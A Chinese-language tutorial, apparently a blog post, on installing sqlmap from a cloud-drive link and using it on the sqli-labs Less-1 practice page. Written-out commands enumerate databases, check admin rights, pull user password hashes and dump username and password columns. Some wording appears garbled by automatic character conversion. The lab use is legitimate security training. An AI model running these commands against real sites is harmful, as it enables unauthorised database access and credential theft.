SQLMAP
-
-
- 一、SqlMap介紹
- 二、SqlMap安裝
- 三、SqlMap的基本操作
-
- 基本參數
-
- 1.打開sqli-labs的第一關,找到注入點
- 2.運作SqlMap,輸入sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" 回車。
- 3.檢視目前使用者權限
- 4.檢視所有資料庫
- 5.檢視目前網站資料庫
- 6.檢視目前網站連接配接使用者
- 7.列出這些使用者對應的密碼
- 8.列出目前資料庫有哪些表
- 9.指定某資料庫某表的列名
- 10.最後就是列出指定列的資料
-
一、SqlMap介紹
- sqlmap是由Python編寫語言編寫的開源滲透測試工具,它主要用來檢測sql注入漏洞,是一款功能強大的sql漏洞檢測利用工具。
- 它能檢測的資料庫:Access、MSSQL、MySQL、Oracle、 postgresql、db2、sqlite。
- 可以進行 sql盲注、union查詢、顯錯注入、延遲注入、post注入、 cookie注入等
二、SqlMap安裝
連結:https://pan.baidu.com/s/1CVAFLiLbVaoEKmwSEQPgjg
提取碼:vjx9
由于是Python編寫語言編寫的工具,是以需要Python環境,已提供Python2.7版本,安裝即可

1.下載下傳解壓後将解壓包放在Python安裝目錄下
2.在桌面右鍵,建立快捷方式
3.輸入快捷方式的名稱
4.複制Python27下sqlmap的路徑,右鍵快捷方式——屬性——修改起始位置
5.輕按兩下運作快捷方式,輸入sqlmap.py -v 檢視版本,界面如下即安裝成功
三、SqlMap的基本操作
基本參數
--is-dba 目前使用者權限
--dbs 所有資料庫
--current-db 網站目前連接配接資料庫
--users 所有資料庫使用者
--current-user 目前資料庫使用者
--tables 清單名
--columns 列字段
--dump 擷取表中的資料,包含列
--level 測試等級(1-5),預設為1
-D 指定資料庫
-T 指定表
-C 指定列
1.打開sqli-labs的第一關,找到注入點
2.運作SqlMap,輸入sqlmap.py -u “http://localhost/sqli-labs/Less-1/?id=1” 回車。
測出的資訊提示存在
1.布爾盲注
2.顯錯注入
3.時間盲注
4.union查詢
資料庫是MySQL
系統為Windows
PHP,Apache,MySQL版本資訊等。
3.檢視目前使用者權限
--is-dba
目前使用者是管理者(目前權限很大)
4.檢視所有資料庫
sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --dbs
5.檢視目前網站資料庫
sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --current-db
6.檢視目前網站連接配接使用者
sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --current-user
7.列出這些使用者對應的密碼
sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --password
8.列出目前資料庫有哪些表
sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --tables -D security
–tables -D security:檢視security資料庫的表
9.指定某資料庫某表的列名
sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --columns -T users -D security
10.最後就是列出指定列的資料
sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --dump -C password,username --columns -T users -D security
總結流程:讀取資料庫—>讀取表—>讀取表列—>讀取内容
歡迎交流WX:YX_NiMing